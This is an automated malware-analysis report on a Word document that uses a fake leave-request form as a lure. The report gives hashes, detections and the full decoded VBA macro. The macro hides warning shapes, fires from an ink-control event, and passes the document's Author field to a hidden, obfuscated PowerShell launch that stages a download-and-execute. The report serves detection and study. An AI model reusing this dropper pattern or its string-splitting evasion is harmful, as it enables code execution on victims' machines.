Office (OLE) malware analysis — malicious · f2259587b948c7ed

MALICIOUS

Office (OLE)

40.5 KB Created: 2013-12-04 19:48:00 Authoring application: Microsoft Office Word First seen: 2018-02-07

MD5: b51cc66588efd1fd9f1a954bdd3f8815 SHA-1: d9d38b2d4a8086d15e045ec2f3d2e82cf6dded41 SHA-256: f2259587b948c7ed8c36ad8480ee5fd9cbdcaa99a25af3f11fed9838f2f2c903

262 Risk Score

Malware Insights

MITRE ATT&CK

T1059.005 Visual Basic T1059.001 PowerShell T1566.001 Spearphishing Attachment

The sample is a malicious Word document containing VBA macros. The macro uses CreateObject to instantiate a WScript.Shell object and then executes a PowerShell command. The PowerShell command is obfuscated by splitting string literals and is intended to download and execute a second-stage payload. The document body presents a fake leave request form to lure the user into enabling macros.

Heuristics 7

ClamAV: Doc.Dropper.Agent-6431535-0 critical CLAMAV_DETECTION

ClamAV detected this file as malware: Doc.Dropper.Agent-6431535-0
VBA macros detected medium 2 related findings OLE_VBA_MACROS

Document contains VBA macro code
Dangerous API name reassembled from split string literals critical OLE_VBA_SPLIT_KEYWORD_OBFUSCATION

VBA concatenates short string literals that reassemble a dangerous API/ProgID/LOLBin name (e.g. Scripting.FileSystemObject, WScript.Shell, powershell, URLDownloadToFile) which appears in no single literal. Splitting an API name across string concatenation is done only to evade keyword scanning.
Matched line in script
```
    authorProperty = ActiveDocument.BuiltInDocumentProperties("Author")
    Set objWShell = CreateObject("WScr" & "ipt.S" & "hell")
    With objWShell.Exec("powe" & "rsh" & "ell.exe -no" & "p -w" & "indowstyle hid" & "den -Com" & "mand -")
```

CreateObject call high OLE_VBA_CREATEOBJ

CreateObject call

Matched line in script

    authorProperty = ActiveDocument.BuiltInDocumentProperties("Author")
    Set objWShell = CreateObject("WScr" & "ipt.S" & "hell")
    With objWShell.Exec("powe" & "rsh" & "ell.exe -no" & "p -w" & "indowstyle hid" & "den -Com" & "mand -")

Reference to PowerShell high SC_STR_POWERSHELL

Reference to PowerShell
LOLBin token sequence in document text high SE_LOLBIN_RUN_COMMAND

Extracted document text contains a Windows script/execution tool name (PowerShell, mshta, cmd, rundll32, regsvr32, …) within 220 characters of a dangerous flag, command verb, or URL. This is a visible 'run this' instruction in HTML/PDF/RTF lure bodies, or — in macro-laden Office files — the macro's own string-pool entries appearing adjacent in extracted text.
Embedded URL info EMBEDDED_URL

One or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.

URL http://schemas.openxmlformats.org/drawingml/2006/main In document text (OLE body)

Extracted artifacts 1

Files carved from inside the sample during analysis.

Filename Kind Source Size

macros.bas vba-macro oletools.olevba.extract_macros (decoded VBA source) 1422 bytes

Filename	Kind	Source	Size
`macros.bas`	vba-macro	oletools.olevba.extract_macros (decoded VBA source)	1422 bytes
SHA-256: `4f23c5e0ec009c3b8c9584f81435a2262c51af2a4ed4e2bb97340b9c08e99676`
Preview script First 1,000 lines of the extracted script Attribute VB_Name = "ThisDocument" Attribute VB_Base = "1Normal.ThisDocument" Attribute VB_GlobalNameSpace = False Attribute VB_Creatable = False Attribute VB_PredeclaredId = True Attribute VB_Exposed = True Attribute VB_TemplateDerived = True Attribute VB_Customizable = True Public Once As Integer Public Sub Launch() On Error Resume Next DeleteWarningShape "warning-div", False DeleteWarningShape "Control 2", False Dim authorProperty As String authorProperty = ActiveDocument.BuiltInDocumentProperties("Author") Set objWShell = CreateObject("WScr" & "ipt.S" & "hell") With objWShell.Exec("powe" & "rsh" & "ell.exe -no" & "p -w" & "indowstyle hid" & "den -Com" & "mand -") .StdIn.WriteLine authorProperty .StdIn.WriteBlankLine 1 .Terminate End With End Sub Private Sub DeleteWarningShape(ByVal textBoxName As String, ByVal saveDocAfter As Boolean) Dim shape As Word.shape On Error Resume Next For Each shape In ActiveDocument.Shapes If StrComp(shape.Name, textBoxName) = 0 Then shape.Delete Exit For End If Next If saveDocAfter Then ActiveDocument.Save End If End Sub Private Sub InkPicture1_Painted(ByVal hDC As Long, ByVal Rect As MSINKAUTLib.IInkRectangle) If Once < 1 Then Launch End If Once = Once + 1 End Sub

SHA-256: 4f23c5e0ec009c3b8c9584f81435a2262c51af2a4ed4e2bb97340b9c08e99676

Preview script

First 1,000 lines of the extracted script

Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Public Once As Integer

Public Sub Launch()
    On Error Resume Next
    DeleteWarningShape "warning-div", False
    DeleteWarningShape "Control 2", False
    
    Dim authorProperty As String
    authorProperty = ActiveDocument.BuiltInDocumentProperties("Author")
    Set objWShell = CreateObject("WScr" & "ipt.S" & "hell")
    With objWShell.Exec("powe" & "rsh" & "ell.exe -no" & "p -w" & "indowstyle hid" & "den -Com" & "mand -")
        .StdIn.WriteLine authorProperty
        .StdIn.WriteBlankLine 1
        .Terminate
    End With
End Sub

Private Sub DeleteWarningShape(ByVal textBoxName As String, ByVal saveDocAfter As Boolean)
    Dim shape As Word.shape
    On Error Resume Next
    For Each shape In ActiveDocument.Shapes
        If StrComp(shape.Name, textBoxName) = 0 Then
            shape.Delete
            Exit For
        End If
    Next
    If saveDocAfter Then
        ActiveDocument.Save
    End If
End Sub

Private Sub InkPicture1_Painted(ByVal hDC As Long, ByVal Rect As MSINKAUTLib.IInkRectangle)
    If Once < 1 Then
        Launch
    End If
    Once = Once + 1
End Sub

Open this report in the interactive analyzer, or submit your own file for analysis.